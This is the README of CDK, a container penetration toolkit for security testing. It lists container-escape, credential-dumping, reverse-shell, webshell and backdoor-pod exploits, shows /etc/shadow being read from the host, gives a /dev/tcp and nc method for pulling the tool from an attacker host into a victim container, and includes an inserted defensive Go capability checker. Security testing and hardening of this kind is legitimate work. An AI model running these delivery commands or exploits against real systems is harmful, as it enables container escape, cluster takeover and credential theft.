
CDK https://github.com/cdk-team/CDK


CDK - Zero Dependency Container Penetration Toolkit



Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-source container penetration toolkit, designed to offer stable exploitation in different slimmed-down containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you escape the container and take over the K8s cluster.

Quick Start

Run cdk eva to gather evaluation info and a recommended exploit, then run cdk run to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download the latest release from https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Delivering CDK into the target container in real-world penetration testing

If you have an exploit that can upload a file, you can upload the CDK binary directly.

If you have an RCE exploit but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host the CDK binary on your host with a public IP:
(on your host)
nc -lvp 999 < cdk
  2. Inside the victim container, execute:
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of etcd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: container escaping, persistence and lateral movement.
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

By default this command runs the scripts below without the local file scan; pass --full to enable all of them.

Tactics                 Script                                        Usage/Example
Information Gathering   OS Basic Info                                 link
Information Gathering   Available Capabilities                        link
Information Gathering   Available Linux Commands                      link
Information Gathering   Mounts                                        link
Information Gathering   Net Namespace                                 link
Information Gathering   Sensitive ENV                                 link
Information Gathering   Sensitive Process                             link
Information Gathering   Sensitive Local Files                         link
Information Gathering   Kube-proxy Route Localnet (CVE-2020-8558)     link
Information Gathering   DNS-Based Service Discovery                   link
Discovery               K8s Api-server Info                           link
Discovery               K8s Service-account Info                      link
Discovery               Cloud Provider Metadata API                   link
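The Available Capabilities script above reads the same kernel data an operator can audit on the defensive side. As an added example that is not part of CDK or its repository, the Go program below decodes the CapEff line of /proc/self/status, the effective capability mask of the current process, and flags the capabilities CDK's evaluate output singles out (CAP_DAC_READ_SEARCH, CAP_SYS_MODULE, CAP_SYS_PTRACE, CAP_SYS_ADMIN). A workload that shows any of these, or a mask that looks like --privileged, should have its security context tightened before deployment. The two status samples are constructed; the privileged-mask rule in LooksPrivileged is an assumption of this example, not a CDK rule.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strconv"
	"strings"
)

// Bit numbers from include/uapi/linux/capability.h for the capabilities
// that CDK's evaluate output flags as escape-relevant.
var riskyCaps = map[uint]string{
	2:  "CAP_DAC_READ_SEARCH", // read arbitrary files from the host
	16: "CAP_SYS_MODULE",      // load kernel modules
	19: "CAP_SYS_PTRACE",      // ptrace-based escape paths
	21: "CAP_SYS_ADMIN",       // mount, cgroup manipulation and more
}

// Constructed sample: a container started with Docker's default capability set.
const sampleDefaultStatus = "Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n"

// Constructed sample: a container started with --privileged on a kernel
// whose highest capability number is 37.
const samplePrivilegedStatus = "Name:\tsh\nCapEff:\t0000003fffffffff\n"

// ParseCapEff returns the effective capability mask found in /proc/<pid>/status text.
func ParseCapEff(status string) (uint64, error) {
	sc := bufio.NewScanner(strings.NewReader(status))
	for sc.Scan() {
		line := sc.Text()
		if strings.HasPrefix(line, "CapEff:") {
			hexMask := strings.TrimSpace(strings.TrimPrefix(line, "CapEff:"))
			return strconv.ParseUint(hexMask, 16, 64)
		}
	}
	return 0, fmt.Errorf("no CapEff line in status text")
}

// RiskyCapabilities lists the risky capabilities set in mask, in bit order.
func RiskyCapabilities(mask uint64) []string {
	var found []string
	for bit := uint(0); bit < 64; bit++ {
		if mask&(uint64(1)<<bit) == 0 {
			continue
		}
		if name, ok := riskyCaps[bit]; ok {
			found = append(found, name)
		}
	}
	return found
}

// LooksPrivileged is a heuristic (an assumption of this example): --privileged
// grants every capability the kernel knows, so the mask is a contiguous run of
// ones starting at bit 0 that covers at least bits 0..37.
func LooksPrivileged(mask uint64) bool {
	contiguous := mask&(mask+1) == 0
	return contiguous && mask >= (uint64(1)<<38)-1
}

func main() {
	status := sampleDefaultStatus
	if raw, err := os.ReadFile("/proc/self/status"); err == nil {
		status = string(raw) // audit the process we are actually running in
	}
	mask, err := ParseCapEff(status)
	if err != nil {
		fmt.Println("error:", err)
		os.Exit(1)
	}
	fmt.Printf("CapEff = %#x\n", mask)
	for _, name := range RiskyCapabilities(mask) {
		fmt.Println("[!] risky capability present:", name)
	}
	if LooksPrivileged(mask) {
		fmt.Println("[!] capability set looks like --privileged")
	}
}
```

Run it inside the container image under review (or feed it a saved /proc/<pid>/status) as part of a pre-deployment check; a clean result is a mask like Docker's default 0xa80425fb with no flagged names.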

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]

Tactic                Technique                                                    CDK Exploit Name         Doc
Escaping              docker-runc CVE-2019-5736                                    runc-pwn
Escaping              containerd-shim CVE-2020-15257                               shim-pwn                 link
Escaping              docker.sock PoC (DIND attack)                                docker-sock-check        link
Escaping              docker.sock RCE                                              docker-sock-pwn          link
Escaping              Docker API (2375) RCE                                        docker-api-pwn           link
Escaping              Device Mount Escaping                                        mount-disk               link
Escaping              LXCFS Escaping                                               lxcfs-rw                 link
Escaping              Cgroups Escaping                                             mount-cgroup             link
Escaping              Abuse Unprivileged User Namespace Escaping CVE-2022-0492     abuse-unpriv-userns      link
Escaping              Procfs Escaping                                              mount-procfs             link
Escaping              Ptrace Escaping PoC                                          check-ptrace             link
Escaping              Rewrite Cgroup (devices.allow)                               rewrite-cgroup-devices   link
Escaping              Read arbitrary file from host system (CAP_DAC_READ_SEARCH)   cap-dac-read-search      link
Discovery             K8s Component Probe                                          service-probe            link
Discovery             Dump Istio Sidecar Meta                                      istio-check              link
Discovery             Dump K8s Pod Security Policies                               k8s-psp-dump             link
Remote Control        Reverse Shell                                                reverse-shell            link
Remote Control        Kubelet Exec                                                 kubelet-exec
Credential Access     Registry BruteForce                                          registry-brute           link
Credential Access     Access Key Scanning                                          ak-leakage               link
Credential Access     Etcd Get K8s Token                                           etcd-get-k8s-token
Credential Access     Dump K8s Secrets                                             k8s-secret-dump          link
Credential Access     Dump K8s Config                                              k8s-configmap-dump       link
Privilege Escalation  K8s RBAC Bypass                                              k8s-get-sa-token         link
Persistence           Deploy WebShell                                              webshell-deploy          link
Persistence           Deploy Backdoor Pod                                          k8s-backdoor-daemonset   link
Persistence           Deploy Shadow K8s api-server                                 k8s-shadow-apiserver     link
Persistence           K8s MITM Attack (CVE-2020-8554)                              k8s-mitm-clusterip       link
Persistence           Deploy K8s CronJob                                           k8s-cronjob              link

Note about Thin: The thin release is prepared for short-lived container shells such as serverless functions. We add build tags in the source code and cut a few exploits to make the binary lighter. The 2MB file contains 90% of CDK's functions; you can also pick useful exploits from the CDK source code to build your own lightweight binary.

Tool Module

These commands run like their Linux counterparts with slightly different input arguments; see the usage links.

cdk nc [options]
cdk ps

Command    Description                              Usage/Example
nc         TCP Tunnel                               link
ps         Process Information                      link
ifconfig   Network Information                      link
vi         Edit Files                               link
ectl       Unauthorized enumeration of etcd keys
kcurl      Request to K8s api-server                link
dcurl      Request to Docker HTTP API               link
ucurl      Request to Docker Unix Socket            link
rcurl      Request to Docker Registry API
probe      IP/Port Scanning                         link

Project Information

Recent Updates

[v1.5.2] - 2023-03-12

Updates

  • Support different container runtimes on Linux, such as containerd, runc and docker
  • Fix the issue where anonymous access to shadow-apiserver did not work; support newer k8s versions such as v1.23.1
  • Add notice messages for features that have been iterated on

[v1.5.0] - 2022-09-25

Updates

  • Check for kernel exploits using mzet-/linux-exploit-suggester
  • Support checking for setuid files in PATH
  • Add red highlighting to the feature list output
  • Support two new formatted print functions
  • Improve highlighting of the CDK banner

[v1.4.0] - 2022-09-04

Updates

  • Add the lxcfs-rw exploit implemented via cgroup release_agent
  • Add recommendation info for lxcfs-rw/lxcfs-rw-cgroup
  • Highlight all mount information

[v1.3.0] - 2022-07-10

Exploits

  • Add unit tests for ParseCDKMain
  • Add 'Exploit container escape with kubelet log access & /var/log mount'
  • Add exploitation of kubelet default unauthorized access (port 10250)

Others

  • Add go test to the GitHub Action
  • Support getting the gateway in Linux containers
  • Update the docs and add a Quick Start section
  • Add getting the gateway inside pods

[v1.2.0] - 2022-06-25

Updates

  • New exploit: get the k8s token from etcd
  • Add an end-of-output message
  • Remove the --insecure-port argument